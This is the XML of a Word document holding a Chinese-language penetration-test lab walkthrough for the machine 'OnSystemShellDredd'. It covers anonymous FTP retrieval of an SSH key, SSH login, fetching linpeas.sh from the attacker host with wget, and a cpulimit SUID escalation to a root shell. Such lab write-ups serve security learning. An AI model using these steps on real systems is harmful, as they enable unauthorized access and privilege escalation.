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4039870" cy="4215765"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5715"/>
            <wp:docPr id="4" name="圖片 4" descr="OnSystemShellDre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OnSystemShellDred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5046980" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="12700" b="7620"/>
            <wp:docPr id="3" name="圖片 3" descr="OnSystemShellDred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OnSystemShellDred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nmap 掃出21(ftp),61000(ssh) protocol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3515" cy="2352040"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10160"/>
            <wp:docPr id="2" name="圖片 2" descr="OnSystemShellDre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OnSystemShellDredd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ftp 192.168.241.130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用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>anonymous進行ftp連線without password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get id_rsa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發現.hannah下有一個</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>id_rsa檔，明顯要用ssh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230" cy="1929130"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="1" name="圖片 1" descr="OnSystemShellDred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OnSystemShellDredd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chmod 600 id_rsa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 xml:space="preserve">ssh -i id_rsa -p 61000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>hannah@192.168.241.130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shh連線，username從.hannah資料夾名猜測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成功取得local.txt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1770" cy="2564765"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="6" name="圖片 6" descr="OnSystemShellDred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OnSystemShellDredd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sudo python3 -m http.server 80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 xml:space="preserve">wget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>http://192.168.45.186/linpeas.sh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chmod +x linpeas.sh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./linpeas.sh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用linpeas.sh掃漏洞，發現mawk、cpulimit bi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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>ary被標記，大概率是關鍵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2405" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="7" name="圖片 7" descr="OnSystemShellDre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OnSystemShellDred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color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://gtfobins.github.io/gtfobins/cpulimit/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Google cpulimit exploit發現gtfobins有相關說明，由於靶機沒有sudo binary，所以將code改為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cpulimit -l 100 -f -- /bin/sh -p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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4206875" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="5" name="圖片 5" descr="OnSystemShellDre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OnSystemShellDredd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成功取得root flag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5494E"/>
    <w:rsid w:val="0F9A686F"/>
    <w:rsid w:val="14821C78"/>
    <w:rsid w:val="1BEB7C77"/>
    <w:rsid w:val="1EB4307D"/>
    <w:rsid w:val="2E29487B"/>
    <w:rsid w:val="3B7261A3"/>
    <w:rsid w:val="474B7CA7"/>
    <w:rsid w:val="49A66307"/>
    <w:rsid w:val="57E74837"/>
    <w:rsid w:val="6548208C"/>
    <w:rsid w:val="65707CE0"/>
    <w:rsid w:val="6FDC0EB3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2024-06-06T02:14:46Z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